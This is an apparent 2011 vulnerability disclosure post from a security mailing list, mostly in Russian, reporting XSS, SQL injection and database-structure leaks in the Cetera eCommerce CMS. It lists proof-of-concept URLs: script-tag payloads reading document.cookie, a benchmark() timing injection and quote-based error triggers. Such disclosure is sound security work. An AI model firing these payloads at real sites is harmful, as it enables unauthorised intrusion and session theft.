Related information

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

Unidesk ReportingService Forceful Browsing Vulnerability

[SECURITY] [DSA 2204-1] imp4 security update

SimplisCMS 1.0.3.0  Remote File Disclosure Vulnerability

SimplisCMS 1.0.3.0  SQL injection / Cross Site Scripting

From:	MustLive <mustlive_(at)_websecurity.com.ua>
Date:	29.03.2011
Subject:	XSS, SQL Injection и SQL DB Structure Extraction уязвимости в Cetera eCommerce

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною новых Cross-Site Scripting, SQL Injection и SQL DB Structure Extraction уязвимостях в Cetera eCommerce.

XSS (WASC-08) (также работают в версии 15.0):

http://site/catalog/%3Cscript%3Ealert(document.
cookie)%3C/script%3E/

http://site/vendors/%3Cscript%3Ealert(document.
cookie)%3C/script%3E/

http://site/catalog/cart/%3Cscript%3Ealert(document.
cookie)%3C/script%3E/

http://site/news/%3Cscript%3Ealert(document.
cookie)%3C/script%3E/

http://site/news/13012011111030/%3Cscript%3Ealert(document.
cookie)%3C/script%3E/

XSS (WASC-08):

http://site/%3Cscript%3Ealert(document.
cookie)%3C/script%3E/

Данная уязвимость появилась в версии 15.0. Уязвимость имеет место на странице с 404 ошибкой, поэтому она сработает как по этому адресу,
так и по другим адресам, которые ведут на несуществующие страницы.

SQL Injection (WASC-19):

http://site/catalog/(version()=5.1)/

http://site/catalog/cart/’+benchmark(100000,
md5(now()))+’/

SQL DB Structure Extraction (WASC-13):

http://site/catalog/%22/

http://site/catalog/cart/’/

Уязвимы Cetera eCommerce 14.0 и предыдущие версии, а XSS уязвимости также касаются версии 15.0. Последние четыре уязвимости уже исправлены
в версии Cetera eCommerce 15.0 (которая вышла в октябре 2010 года).

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/4883/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua